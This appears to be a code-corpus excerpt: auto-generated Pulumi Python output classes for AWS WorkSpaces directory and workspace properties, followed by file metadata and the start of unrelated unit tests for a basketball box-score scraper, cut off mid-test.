@staticmethod
def __key_warning(key: str):
suggest = None
if key == "changeComputeType":
suggest = "change_compute_type"
elif key == "increaseVolumeSize":
suggest = "increase_volume_size"
elif key == "rebuildWorkspace":
suggest = "rebuild_workspace"
elif key == "restartWorkspace":
suggest = "restart_workspace"
elif key == "switchRunningMode":
suggest = "switch_running_mode"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in DirectorySelfServicePermissions. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
DirectorySelfServicePermissions.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
DirectorySelfServicePermissions.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
change_compute_type: Optional[bool] = None,
increase_volume_size: Optional[bool] = None,
rebuild_workspace: Optional[bool] = None,
restart_workspace: Optional[bool] = None,
switch_running_mode: Optional[bool] = None):
"""
:param bool change_compute_type: Whether WorkSpaces directory users can change the compute type (bundle) for their workspace. Default `false`.
:param bool increase_volume_size: Whether WorkSpaces directory users can increase the volume size of the drives on their workspace. Default `false`.
:param bool rebuild_workspace: Whether WorkSpaces directory users can rebuild the operating system of a workspace to its original state. Default `false`.
:param bool restart_workspace: Whether WorkSpaces directory users can restart their workspace. Default `true`.
:param bool switch_running_mode: Whether WorkSpaces directory users can switch the running mode of their workspace. Default `false`.
"""
if change_compute_type is not None:
pulumi.set(__self__, "change_compute_type", change_compute_type)
if increase_volume_size is not None:
pulumi.set(__self__, "increase_volume_size", increase_volume_size)
if rebuild_workspace is not None:
pulumi.set(__self__, "rebuild_workspace", rebuild_workspace)
if restart_workspace is not None:
pulumi.set(__self__, "restart_workspace", restart_workspace)
if switch_running_mode is not None:
pulumi.set(__self__, "switch_running_mode", switch_running_mode)
@property
@pulumi.getter(name="changeComputeType")
def change_compute_type(self) -> Optional[bool]:
"""
Whether WorkSpaces directory users can change the compute type (bundle) for their workspace. Default `false`.
"""
return pulumi.get(self, "change_compute_type")
@property
@pulumi.getter(name="increaseVolumeSize")
def increase_volume_size(self) -> Optional[bool]:
"""
Whether WorkSpaces directory users can increase the volume size of the drives on their workspace. Default `false`.
"""
return pulumi.get(self, "increase_volume_size")
@property
@pulumi.getter(name="rebuildWorkspace")
def rebuild_workspace(self) -> Optional[bool]:
"""
Whether WorkSpaces directory users can rebuild the operating system of a workspace to its original state. Default `false`.
"""
return pulumi.get(self, "rebuild_workspace")
@property
@pulumi.getter(name="restartWorkspace")
def restart_workspace(self) -> Optional[bool]:
"""
Whether WorkSpaces directory users can restart their workspace. Default `true`.
"""
return pulumi.get(self, "restart_workspace")
@property
@pulumi.getter(name="switchRunningMode")
def switch_running_mode(self) -> Optional[bool]:
"""
Whether WorkSpaces directory users can switch the running mode of their workspace. Default `false`.
"""
return pulumi.get(self, "switch_running_mode")
@pulumi.output_type
class DirectoryWorkspaceAccessProperties(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "deviceTypeAndroid":
suggest = "device_type_android"
elif key == "deviceTypeChromeos":
suggest = "device_type_chromeos"
elif key == "deviceTypeIos":
suggest = "device_type_ios"
elif key == "deviceTypeLinux":
suggest = "device_type_linux"
elif key == "deviceTypeOsx":
suggest = "device_type_osx"
elif key == "deviceTypeWeb":
suggest = "device_type_web"
elif key == "deviceTypeWindows":
suggest = "device_type_windows"
elif key == "deviceTypeZeroclient":
suggest = "device_type_zeroclient"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in DirectoryWorkspaceAccessProperties. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
DirectoryWorkspaceAccessProperties.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
DirectoryWorkspaceAccessProperties.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
device_type_android: Optional[str] = None,
device_type_chromeos: Optional[str] = None,
device_type_ios: Optional[str] = None,
device_type_linux: Optional[str] = None,
device_type_osx: Optional[str] = None,
device_type_web: Optional[str] = None,
device_type_windows: Optional[str] = None,
device_type_zeroclient: Optional[str] = None):
"""
:param str device_type_android: Indicates whether users can use Android devices to access their WorkSpaces.
:param str device_type_chromeos: Indicates whether users can use Chromebooks to access their WorkSpaces.
:param str device_type_ios: Indicates whether users can use iOS devices to access their WorkSpaces.
:param str device_type_linux: Indicates whether users can use Linux clients to access their WorkSpaces.
:param str device_type_osx: Indicates whether users can use macOS clients to access their WorkSpaces.
:param str device_type_web: Indicates whether users can access their WorkSpaces through a web browser.
:param str device_type_windows: Indicates whether users can use Windows clients to access their WorkSpaces.
:param str device_type_zeroclient: Indicates whether users can use zero client devices to access their WorkSpaces.
"""
if device_type_android is not None:
pulumi.set(__self__, "device_type_android", device_type_android)
if device_type_chromeos is not None:
pulumi.set(__self__, "device_type_chromeos", device_type_chromeos)
if device_type_ios is not None:
pulumi.set(__self__, "device_type_ios", device_type_ios)
if device_type_linux is not None:
pulumi.set(__self__, "device_type_linux", device_type_linux)
if device_type_osx is not None:
pulumi.set(__self__, "device_type_osx", device_type_osx)
if device_type_web is not None:
pulumi.set(__self__, "device_type_web", device_type_web)
if device_type_windows is not None:
pulumi.set(__self__, "device_type_windows", device_type_windows)
if device_type_zeroclient is not None:
pulumi.set(__self__, "device_type_zeroclient", device_type_zeroclient)
@property
@pulumi.getter(name="deviceTypeAndroid")
def device_type_android(self) -> Optional[str]:
"""
Indicates whether users can use Android devices to access their WorkSpaces.
"""
return pulumi.get(self, "device_type_android")
@property
@pulumi.getter(name="deviceTypeChromeos")
def device_type_chromeos(self) -> Optional[str]:
"""
Indicates whether users can use Chromebooks to access their WorkSpaces.
"""
return pulumi.get(self, "device_type_chromeos")
@property
@pulumi.getter(name="deviceTypeIos")
def device_type_ios(self) -> Optional[str]:
"""
Indicates whether users can use iOS devices to access their WorkSpaces.
"""
return pulumi.get(self, "device_type_ios")
@property
@pulumi.getter(name="deviceTypeLinux")
def device_type_linux(self) -> Optional[str]:
"""
Indicates whether users can use Linux clients to access their WorkSpaces.
"""
return pulumi.get(self, "device_type_linux")
@property
@pulumi.getter(name="deviceTypeOsx")
def device_type_osx(self) -> Optional[str]:
"""
Indicates whether users can use macOS clients to access their WorkSpaces.
"""
return pulumi.get(self, "device_type_osx")
@property
@pulumi.getter(name="deviceTypeWeb")
def device_type_web(self) -> Optional[str]:
"""
Indicates whether users can access their WorkSpaces through a web browser.
"""
return pulumi.get(self, "device_type_web")
@property
@pulumi.getter(name="deviceTypeWindows")
def device_type_windows(self) -> Optional[str]:
"""
Indicates whether users can use Windows clients to access their WorkSpaces.
"""
return pulumi.get(self, "device_type_windows")
@property
@pulumi.getter(name="deviceTypeZeroclient")
def device_type_zeroclient(self) -> Optional[str]:
"""
Indicates whether users can use zero client devices to access their WorkSpaces.
"""
return pulumi.get(self, "device_type_zeroclient")
@pulumi.output_type
class DirectoryWorkspaceCreationProperties(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "customSecurityGroupId":
suggest = "custom_security_group_id"
elif key == "defaultOu":
suggest = "default_ou"
elif key == "enableInternetAccess":
suggest = "enable_internet_access"
elif key == "enableMaintenanceMode":
suggest = "enable_maintenance_mode"
elif key == "userEnabledAsLocalAdministrator":
suggest = "user_enabled_as_local_administrator"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in DirectoryWorkspaceCreationProperties. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
DirectoryWorkspaceCreationProperties.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
DirectoryWorkspaceCreationProperties.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
custom_security_group_id: Optional[str] = None,
default_ou: Optional[str] = None,
enable_internet_access: Optional[bool] = None,
enable_maintenance_mode: Optional[bool] = None,
user_enabled_as_local_administrator: Optional[bool] = None):
"""
:param str custom_security_group_id: The identifier of your custom security group. It should belong to the same VPC in which the WorkSpaces reside.
:param str default_ou: The default organizational unit (OU) for your WorkSpace directories. It should conform to the `"OU=<value>,DC=<value>,...,DC=<value>"` pattern.
:param bool enable_internet_access: Indicates whether internet access is enabled for your WorkSpaces.
:param bool enable_maintenance_mode: Indicates whether maintenance mode is enabled for your WorkSpaces. For more information, see [WorkSpace Maintenance](https://docs.aws.amazon.com/workspaces/latest/adminguide/workspace-maintenance.html).
:param bool user_enabled_as_local_administrator: Indicates whether users are local administrators of their WorkSpaces.
"""
if custom_security_group_id is not None:
pulumi.set(__self__, "custom_security_group_id", custom_security_group_id)
if default_ou is not None:
pulumi.set(__self__, "default_ou", default_ou)
if enable_internet_access is not None:
pulumi.set(__self__, "enable_internet_access", enable_internet_access)
if enable_maintenance_mode is not None:
pulumi.set(__self__, "enable_maintenance_mode", enable_maintenance_mode)
if user_enabled_as_local_administrator is not None:
pulumi.set(__self__, "user_enabled_as_local_administrator", user_enabled_as_local_administrator)
@property
@pulumi.getter(name="customSecurityGroupId")
def custom_security_group_id(self) -> Optional[str]:
"""
The identifier of your custom security group. It should belong to the same VPC in which the WorkSpaces reside.
"""
return pulumi.get(self, "custom_security_group_id")
@property
@pulumi.getter(name="defaultOu")
def default_ou(self) -> Optional[str]:
"""
The default organizational unit (OU) for your WorkSpace directories. It should conform to the `"OU=<value>,DC=<value>,...,DC=<value>"` pattern.
"""
return pulumi.get(self, "default_ou")
@property
@pulumi.getter(name="enableInternetAccess")
def enable_internet_access(self) -> Optional[bool]:
"""
Indicates whether internet access is enabled for your WorkSpaces.
"""
return pulumi.get(self, "enable_internet_access")
@property
@pulumi.getter(name="enableMaintenanceMode")
def enable_maintenance_mode(self) -> Optional[bool]:
"""
Indicates whether maintenance mode is enabled for your WorkSpaces. For more information, see [WorkSpace Maintenance](https://docs.aws.amazon.com/workspaces/latest/adminguide/workspace-maintenance.html).
"""
return pulumi.get(self, "enable_maintenance_mode")
@property
@pulumi.getter(name="userEnabledAsLocalAdministrator")
def user_enabled_as_local_administrator(self) -> Optional[bool]:
"""
Indicates whether users are local administrators of their WorkSpaces.
"""
return pulumi.get(self, "user_enabled_as_local_administrator")
@pulumi.output_type
class IpGroupRule(dict):
def __init__(__self__, *,
source: str,
description: Optional[str] = None):
"""
:param str source: The IP address range, in CIDR notation, e.g. `10.0.0.0/16`
:param str description: The description.
"""
pulumi.set(__self__, "source", source)
if description is not None:
pulumi.set(__self__, "description", description)
@property
@pulumi.getter
def source(self) -> str:
"""
The IP address range, in CIDR notation, e.g. `10.0.0.0/16`
"""
return pulumi.get(self, "source")
@property
@pulumi.getter
def description(self) -> Optional[str]:
"""
The description.
"""
return pulumi.get(self, "description")
@pulumi.output_type
class WorkspaceWorkspaceProperties(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "computeTypeName":
suggest = "compute_type_name"
elif key == "rootVolumeSizeGib":
suggest = "root_volume_size_gib"
elif key == "runningMode":
suggest = "running_mode"
elif key == "runningModeAutoStopTimeoutInMinutes":
suggest = "running_mode_auto_stop_timeout_in_minutes"
elif key == "userVolumeSizeGib":
suggest = "user_volume_size_gib"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in WorkspaceWorkspaceProperties. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
WorkspaceWorkspaceProperties.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
WorkspaceWorkspaceProperties.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
compute_type_name: Optional[str] = None,
root_volume_size_gib: Optional[int] = None,
running_mode: Optional[str] = None,
running_mode_auto_stop_timeout_in_minutes: Optional[int] = None,
user_volume_size_gib: Optional[int] = None):
"""
:param str compute_type_name: The compute type. For more information, see [Amazon WorkSpaces Bundles](http://aws.amazon.com/workspaces/details/#Amazon_WorkSpaces_Bundles). Valid values are `VALUE`, `STANDARD`, `PERFORMANCE`, `POWER`, `GRAPHICS`, `POWERPRO` and `GRAPHICSPRO`.
:param int root_volume_size_gib: The size of the root volume.
:param str running_mode: The running mode. For more information, see [Manage the WorkSpace Running Mode](https://docs.aws.amazon.com/workspaces/latest/adminguide/running-mode.html). Valid values are `AUTO_STOP` and `ALWAYS_ON`.
:param int running_mode_auto_stop_timeout_in_minutes: The time after a user logs off when WorkSpaces are automatically stopped. Configured in 60-minute intervals.
:param int user_volume_size_gib: The size of the user storage.
"""
if compute_type_name is not None:
pulumi.set(__self__, "compute_type_name", compute_type_name)
if root_volume_size_gib is not None:
pulumi.set(__self__, "root_volume_size_gib", root_volume_size_gib)
if running_mode is not None:
pulumi.set(__self__, "running_mode", running_mode)
if running_mode_auto_stop_timeout_in_minutes is not None:
pulumi.set(__self__, "running_mode_auto_stop_timeout_in_minutes", running_mode_auto_stop_timeout_in_minutes)
if user_volume_size_gib is not None:
pulumi.set(__self__, "user_volume_size_gib", user_volume_size_gib)
@property
@pulumi.getter(name="computeTypeName")
def compute_type_name(self) -> Optional[str]:
"""
The compute type. For more information, see [Amazon WorkSpaces Bundles](http://aws.amazon.com/workspaces/details/#Amazon_WorkSpaces_Bundles). Valid values are `VALUE`, `STANDARD`, `PERFORMANCE`, `POWER`, `GRAPHICS`, `POWERPRO` and `GRAPHICSPRO`.
"""
return pulumi.get(self, "compute_type_name")
@property
@pulumi.getter(name="rootVolumeSizeGib")
def root_volume_size_gib(self) -> Optional[int]:
"""
The size of the root volume.
"""
return pulumi.get(self, "root_volume_size_gib")
@property
@pulumi.getter(name="runningMode")
def running_mode(self) -> Optional[str]:
"""
The running mode. For more information, see [Manage the WorkSpace Running Mode](https://docs.aws.amazon.com/workspaces/latest/adminguide/running-mode.html). Valid values are `AUTO_STOP` and `ALWAYS_ON`.
"""
return pulumi.get(self, "running_mode")
@property
@pulumi.getter(name="runningModeAutoStopTimeoutInMinutes")
def running_mode_auto_stop_timeout_in_minutes(self) -> Optional[int]:
"""
The time after a user logs off when WorkSpaces are automatically stopped. Configured in 60-minute intervals.
"""
return pulumi.get(self, "running_mode_auto_stop_timeout_in_minutes")
@property
@pulumi.getter(name="userVolumeSizeGib")
def user_volume_size_gib(self) -> Optional[int]:
"""
The size of the user storage.
"""
return pulumi.get(self, "user_volume_size_gib")
@pulumi.output_type
class GetBundleComputeTypeResult(dict):
def __init__(__self__, *,
name: str):
"""
:param str name: The name of the bundle. You cannot combine this parameter with `bundle_id`.
"""
pulumi.set(__self__, "name", name)
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the bundle. You cannot combine this parameter with `bundle_id`.
"""
return pulumi.get(self, "name")
@pulumi.output_type
class GetBundleRootStorageResult(dict):
def __init__(__self__, *,
capacity: str):
"""
:param str capacity: The size of the root storage.
"""
pulumi.set(__self__, "capacity", capacity)
@property
@pulumi.getter
def capacity(self) -> str:
"""
The size of the root storage.
"""
return pulumi.get(self, "capacity")
@pulumi.output_type
class GetBundleUserStorageResult(dict):
def __init__(__self__, *,
capacity: str):
"""
:param str capacity: The size of the user storage.
"""
pulumi.set(__self__, "capacity", capacity)
@property
@pulumi.getter
def capacity(self) -> str:
"""
The size of the user storage.
"""
return pulumi.get(self, "capacity")
@pulumi.output_type
class GetDirectorySelfServicePermissionResult(dict):
def __init__(__self__, *,
change_compute_type: bool,
increase_volume_size: bool,
rebuild_workspace: bool,
restart_workspace: bool,
switch_running_mode: bool):
"""
:param bool change_compute_type: Whether WorkSpaces directory users can change the compute type (bundle) for their workspace.
:param bool increase_volume_size: Whether WorkSpaces directory users can increase the volume size of the drives on their workspace.
:param bool rebuild_workspace: Whether WorkSpaces directory users can rebuild the operating system of a workspace to its original state.
:param bool restart_workspace: Whether WorkSpaces directory users can restart their workspace.
:param bool switch_running_mode: Whether WorkSpaces directory users can switch the running mode of their workspace.
"""
pulumi.set(__self__, "change_compute_type", change_compute_type)
pulumi.set(__self__, "increase_volume_size", increase_volume_size)
pulumi.set(__self__, "rebuild_workspace", rebuild_workspace)
pulumi.set(__self__, "restart_workspace", restart_workspace)
pulumi.set(__self__, "switch_running_mode", switch_running_mode)
@property
@pulumi.getter(name="changeComputeType")
def change_compute_type(self) -> bool:
"""
Whether WorkSpaces directory users can change the compute type (bundle) for their workspace.
"""
return pulumi.get(self, "change_compute_type")
@property
@pulumi.getter(name="increaseVolumeSize")
def increase_volume_size(self) -> bool:
"""
Whether WorkSpaces directory users can increase the volume size of the drives on their workspace.
"""
return pulumi.get(self, "increase_volume_size")
@property
@pulumi.getter(name="rebuildWorkspace")
def rebuild_workspace(self) -> bool:
"""
Whether WorkSpaces directory users can rebuild the operating system of a workspace to its original state.
"""
return pulumi.get(self, "rebuild_workspace")
@property
@pulumi.getter(name="restartWorkspace")
def restart_workspace(self) -> bool:
"""
Whether WorkSpaces directory users can restart their workspace.
"""
return pulumi.get(self, "restart_workspace")
@property
@pulumi.getter(name="switchRunningMode")
def switch_running_mode(self) -> bool:
"""
Whether WorkSpaces directory users can switch the running mode of their workspace.
"""
return pulumi.get(self, "switch_running_mode")
@pulumi.output_type
class GetDirectoryWorkspaceAccessPropertyResult(dict):
def __init__(__self__, *,
device_type_android: str,
device_type_chromeos: str,
device_type_ios: str,
device_type_linux: str,
device_type_osx: str,
device_type_web: str,
device_type_windows: str,
device_type_zeroclient: str):
"""
:param str device_type_android: (Optional) Indicates whether users can use Android devices to access their WorkSpaces.
:param str device_type_chromeos: (Optional) Indicates whether users can use Chromebooks to access their WorkSpaces.
:param str device_type_ios: (Optional) Indicates whether users can use iOS devices to access their WorkSpaces.
:param str device_type_linux: (Optional) Indicates whether users can use Linux clients to access their WorkSpaces.
:param str device_type_osx: (Optional) Indicates whether users can use macOS clients to access their WorkSpaces.
:param str device_type_web: (Optional) Indicates whether users can access their WorkSpaces through a web browser.
:param str device_type_windows: (Optional) Indicates whether users can use Windows clients to access their WorkSpaces.
:param str device_type_zeroclient: (Optional) Indicates whether users can use zero client devices to access their WorkSpaces.
"""
pulumi.set(__self__, "device_type_android", device_type_android)
pulumi.set(__self__, "device_type_chromeos", device_type_chromeos)
pulumi.set(__self__, "device_type_ios", device_type_ios)
pulumi.set(__self__, "device_type_linux", device_type_linux)
pulumi.set(__self__, "device_type_osx", device_type_osx)
pulumi.set(__self__, "device_type_web", device_type_web)
pulumi.set(__self__, "device_type_windows", device_type_windows)
pulumi.set(__self__, "device_type_zeroclient", device_type_zeroclient)
@property
@pulumi.getter(name="deviceTypeAndroid")
def device_type_android(self) -> str:
"""
(Optional) Indicates whether users can use Android devices to access their WorkSpaces.
"""
return pulumi.get(self, "device_type_android")
@property
@pulumi.getter(name="deviceTypeChromeos")
def device_type_chromeos(self) -> str:
"""
(Optional) Indicates whether users can use Chromebooks to access their WorkSpaces.
"""
return pulumi.get(self, "device_type_chromeos")
@property
@pulumi.getter(name="deviceTypeIos")
def device_type_ios(self) -> str:
"""
(Optional) Indicates whether users can use iOS devices to access their WorkSpaces.
"""
return pulumi.get(self, "device_type_ios")
@property
@pulumi.getter(name="deviceTypeLinux")
def device_type_linux(self) -> str:
"""
(Optional) Indicates whether users can use Linux clients to access their WorkSpaces.
"""
return pulumi.get(self, "device_type_linux")
@property
@pulumi.getter(name="deviceTypeOsx")
def device_type_osx(self) -> str:
"""
(Optional) Indicates whether users can use macOS clients to access their WorkSpaces.
"""
return pulumi.get(self, "device_type_osx")
@property
@pulumi.getter(name="deviceTypeWeb")
def device_type_web(self) -> str:
"""
(Optional) Indicates whether users can access their WorkSpaces through a web browser.
"""
return pulumi.get(self, "device_type_web")
@property
@pulumi.getter(name="deviceTypeWindows")
def device_type_windows(self) -> str:
"""
(Optional) Indicates whether users can use Windows clients to access their WorkSpaces.
"""
return pulumi.get(self, "device_type_windows")
@property
@pulumi.getter(name="deviceTypeZeroclient")
def device_type_zeroclient(self) -> str:
"""
(Optional) Indicates whether users can use zero client devices to access their WorkSpaces.
"""
return pulumi.get(self, "device_type_zeroclient")
@pulumi.output_type
class GetDirectoryWorkspaceCreationPropertyResult(dict):
def __init__(__self__, *,
custom_security_group_id: str,
default_ou: str,
enable_internet_access: bool,
enable_maintenance_mode: bool,
user_enabled_as_local_administrator: bool):
"""
:param str custom_security_group_id: The identifier of your custom security group. It must belong to the same VPC in which the WorkSpaces reside.
:param str default_ou: The default organizational unit (OU) for your WorkSpace directories.
:param bool enable_internet_access: Indicates whether internet access is enabled for your WorkSpaces.
:param bool enable_maintenance_mode: Indicates whether maintenance mode is enabled for your WorkSpaces. For more information, see [WorkSpace Maintenance](https://docs.aws.amazon.com/workspaces/latest/adminguide/workspace-maintenance.html).
:param bool user_enabled_as_local_administrator: Indicates whether users are local administrators of their WorkSpaces.
"""
pulumi.set(__self__, "custom_security_group_id", custom_security_group_id)
pulumi.set(__self__, "default_ou", default_ou)
pulumi.set(__self__, "enable_internet_access", enable_internet_access)
pulumi.set(__self__, "enable_maintenance_mode", enable_maintenance_mode)
pulumi.set(__self__, "user_enabled_as_local_administrator", user_enabled_as_local_administrator)
@property
@pulumi.getter(name="customSecurityGroupId")
def custom_security_group_id(self) -> str:
"""
The identifier of your custom security group. It must belong to the same VPC in which the WorkSpaces reside.
"""
return pulumi.get(self, "custom_security_group_id")
@property
@pulumi.getter(name="defaultOu")
def default_ou(self) -> str:
"""
The default organizational unit (OU) for your WorkSpace directories.
"""
return pulumi.get(self, "default_ou")
@property
@pulumi.getter(name="enableInternetAccess")
def enable_internet_access(self) -> bool:
"""
Indicates whether internet access is enabled for your WorkSpaces.
"""
return pulumi.get(self, "enable_internet_access")
@property
@pulumi.getter(name="enableMaintenanceMode")
def enable_maintenance_mode(self) -> bool:
"""
Indicates whether maintenance mode is enabled for your WorkSpaces. For more information, see [WorkSpace Maintenance](https://docs.aws.amazon.com/workspaces/latest/adminguide/workspace-maintenance.html).
"""
return pulumi.get(self, "enable_maintenance_mode")
@property
@pulumi.getter(name="userEnabledAsLocalAdministrator")
def user_enabled_as_local_administrator(self) -> bool:
"""
Indicates whether users are local administrators of their WorkSpaces.
"""
return pulumi.get(self, "user_enabled_as_local_administrator")
@pulumi.output_type
class GetWorkspaceWorkspacePropertyResult(dict):
def __init__(__self__, *,
compute_type_name: str,
root_volume_size_gib: int,
running_mode: str,
running_mode_auto_stop_timeout_in_minutes: int,
user_volume_size_gib: int):
"""
:param str compute_type_name: The compute type. For more information, see [Amazon WorkSpaces Bundles](http://aws.amazon.com/workspaces/details/#Amazon_WorkSpaces_Bundles). Valid values are `VALUE`, `STANDARD`, `PERFORMANCE`, `POWER`, `GRAPHICS`, `POWERPRO` and `GRAPHICSPRO`.
:param int root_volume_size_gib: The size of the root volume.
:param str running_mode: The running mode. For more information, see [Manage the WorkSpace Running Mode](https://docs.aws.amazon.com/workspaces/latest/adminguide/running-mode.html). Valid values are `AUTO_STOP` and `ALWAYS_ON`.
:param int running_mode_auto_stop_timeout_in_minutes: The time after a user logs off when WorkSpaces are automatically stopped. Configured in 60-minute intervals.
:param int user_volume_size_gib: The size of the user storage.
"""
pulumi.set(__self__, "compute_type_name", compute_type_name)
pulumi.set(__self__, "root_volume_size_gib", root_volume_size_gib)
pulumi.set(__self__, "running_mode", running_mode)
pulumi.set(__self__, "running_mode_auto_stop_timeout_in_minutes", running_mode_auto_stop_timeout_in_minutes)
pulumi.set(__self__, "user_volume_size_gib", user_volume_size_gib)
@property
@pulumi.getter(name="computeTypeName")
def compute_type_name(self) -> str:
"""
The compute type. For more information, see [Amazon WorkSpaces Bundles](http://aws.amazon.com/workspaces/details/#Amazon_WorkSpaces_Bundles). Valid values are `VALUE`, `STANDARD`, `PERFORMANCE`, `POWER`, `GRAPHICS`, `POWERPRO` and `GRAPHICSPRO`.
"""
return pulumi.get(self, "compute_type_name")
@property
@pulumi.getter(name="rootVolumeSizeGib")
def root_volume_size_gib(self) -> int:
"""
The size of the root volume.
"""
return pulumi.get(self, "root_volume_size_gib")
@property
@pulumi.getter(name="runningMode")
def running_mode(self) -> str:
"""
The running mode. For more information, see [Manage the WorkSpace Running Mode](https://docs.aws.amazon.com/workspaces/latest/adminguide/running-mode.html). Valid values are `AUTO_STOP` and `ALWAYS_ON`.
"""
return pulumi.get(self, "running_mode")
@property
@pulumi.getter(name="runningModeAutoStopTimeoutInMinutes")
def running_mode_auto_stop_timeout_in_minutes(self) -> int:
"""
The time after a user logs off when WorkSpaces are automatically stopped. Configured in 60-minute intervals.
"""
return pulumi.get(self, "running_mode_auto_stop_timeout_in_minutes")
@property
@pulumi.getter(name="userVolumeSizeGib")
def user_volume_size_gib(self) -> int:
"""
The size of the user storage.
"""
return pulumi.get(self, "user_volume_size_gib")
| 44.09613
| 283
| 0.676538
| 4,029
| 35,321
| 5.65376
| 0.061802
| 0.049168
| 0.029106
| 0.042539
| 0.836209
| 0.818649
| 0.805962
| 0.769964
| 0.758242
| 0.704552
| 0
| 0.000849
| 0.233119
| 35,321
| 800
| 284
| 44.15125
| 0.840108
| 0.322811
| 0
| 0.56
| 1
| 0.008421
| 0.200515
| 0.074798
| 0
| 0
| 0
| 0
| 0
| 1
| 0.157895
| false
| 0
| 0.010526
| 0
| 0.317895
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
906338162d06dcdf77969ccd85513a63f4daca42
| 10,571
|
py
|
Python
|
tests/unit/html/test_basic_box_score_row.py
|
tttgm/basketball_reference_web_scraper
|
2dbd9d7bacbcfee17f08bcf8629bd7d50893761d
|
[
"MIT"
] | 325
|
2015-10-27T03:15:49.000Z
|
2022-03-16T06:49:12.000Z
|
tests/unit/html/test_basic_box_score_row.py
|
tttgm/basketball_reference_web_scraper
|
2dbd9d7bacbcfee17f08bcf8629bd7d50893761d
|
[
"MIT"
] | 173
|
2018-10-16T04:11:05.000Z
|
2022-03-29T17:52:08.000Z
|
tests/unit/html/test_basic_box_score_row.py
|
tttgm/basketball_reference_web_scraper
|
2dbd9d7bacbcfee17f08bcf8629bd7d50893761d
|
[
"MIT"
] | 97
|
2016-04-09T19:11:28.000Z
|
2022-03-21T09:57:50.000Z
|
from unittest import TestCase
from unittest.mock import MagicMock
from basketball_reference_web_scraper.html import BasicBoxScoreRow
class TestBasicBoxScoreRow(TestCase):
def setUp(self):
self.html = MagicMock()
def test_playing_time_when_cells_exist(self):
cell = MagicMock(text_content=MagicMock(return_value="some playing time"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(BasicBoxScoreRow(html=self.html).playing_time, "some playing time")
self.html.xpath.assert_called_once_with('td[@data-stat="mp"]')
def test_playing_time_is_empty_string_when_cells_do_not_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).playing_time, '')
self.html.xpath.assert_called_once_with('td[@data-stat="mp"]')
def test_minutes_played_when_cells_exist(self):
cell = MagicMock(text_content=MagicMock(return_value="some minutes played"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(BasicBoxScoreRow(html=self.html).minutes_played, "some minutes played")
self.html.xpath.assert_called_once_with('td[@data-stat="mp"]')
def test_minutes_played_is_empty_string_when_cells_do_not_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).minutes_played, '')
self.html.xpath.assert_called_once_with('td[@data-stat="mp"]')
def test_made_field_goals_when_cells_exist(self):
cell = MagicMock(text_content=MagicMock(return_value="some made field goals"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(BasicBoxScoreRow(html=self.html).made_field_goals, "some made field goals")
self.html.xpath.assert_called_once_with('td[@data-stat="fg"]')
def test_made_field_goals_is_empty_string_when_cells_do_not_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).made_field_goals, '')
self.html.xpath.assert_called_once_with('td[@data-stat="fg"]')
def test_attempted_field_goals_when_cells_exist(self):
cell = MagicMock(text_content=MagicMock(return_value="some attempted field goals"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(BasicBoxScoreRow(html=self.html).attempted_field_goals, "some attempted field goals")
self.html.xpath.assert_called_once_with('td[@data-stat="fga"]')
def test_attempted_field_goals_is_empty_string_when_cells_do_not_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).attempted_field_goals, '')
self.html.xpath.assert_called_once_with('td[@data-stat="fga"]')
def test_made_three_point_field_goals_when_cells_exist(self):
cell = MagicMock(text_content=MagicMock(return_value="some made three point field goals"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(
BasicBoxScoreRow(html=self.html).made_three_point_field_goals,
"some made three point field goals",
)
self.html.xpath.assert_called_once_with('td[@data-stat="fg3"]')
def test_made_three_point_field_goals_is_empty_string_when_cells_do_not_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).made_three_point_field_goals, '')
self.html.xpath.assert_called_once_with('td[@data-stat="fg3"]')
def test_attempted_three_point_field_goals_when_cells_exist(self):
cell = MagicMock(text_content=MagicMock(return_value="some attempted three point field goals"))
self.html.xpath = MagicMock(return_value=[cell])
self.assertEqual(
BasicBoxScoreRow(html=self.html).attempted_three_point_field_goals,
"some attempted three point field goals",
)
self.html.xpath.assert_called_once_with('td[@data-stat="fg3a"]')
def test_attempted_three_point_field_goals_is_empty_string_when_cells_do_not_exist(self):
self.html.xpath = MagicMock(return_value=[])
self.assertEqual(BasicBoxScoreRow(html=self.html).attempted_three_point_field_goals, '')
self.html.xpath.assert_called_once_with('td[@data-stat="fg3a"]')
def test_made_free_throws_when_cells_exist(self):
